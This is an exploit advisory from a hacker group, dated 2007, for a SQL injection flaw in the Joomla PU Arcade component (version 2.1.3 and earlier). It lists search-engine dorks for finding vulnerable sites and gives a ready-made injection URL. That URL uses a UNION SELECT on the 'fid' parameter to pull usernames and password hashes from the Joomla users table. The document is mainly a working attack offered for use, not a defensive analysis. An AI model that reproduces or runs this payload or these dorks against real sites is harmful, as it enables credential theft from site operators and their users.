Joomla Component PU Arcade <= 2.1.3 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component PU Arcade <= 2.1.3 SQL Injection Vulnerability
# Published : 2007-12-31
# Author : Houssamix
# Previous Title : WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit
# Next Title : CMS Made Simple <= 1.2.2 (TinyMCE module) SQL Injection Vuln

#########################################################################
          Joomla Component  PU Arcade Remote SQL Injection Exploit
#########################################################################

## AUTHOR :  HouSSamix of H-T TeaM
We are ( HouSSamix _ ToXiC350 _ CoNaN ) 

## HOME : http://no-hack.net

## Script :  PU Arcade Joomla Component ( Tested in version 2.0.3 & 2.1.3 Beta )

## Download : http://www.pragmaticutopia.com/

## DorKs :  PU Arcade by www.pragmaticutopia.com
                         inurl:index.php?option=com_puarcade
                         inurl:/option,com_puarcade/
			
## EXPLOIT :

http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--


## GREETZ  :  GoLd_M , RoMaNcYxHaCkEr , Jiko , cx0x  and all musulmans hackers

#########################################################################
           Joomla Component  PU Arcade Remote SQL Injection Exploit
#########################################################################

# www.Syue.com [2007-12-31]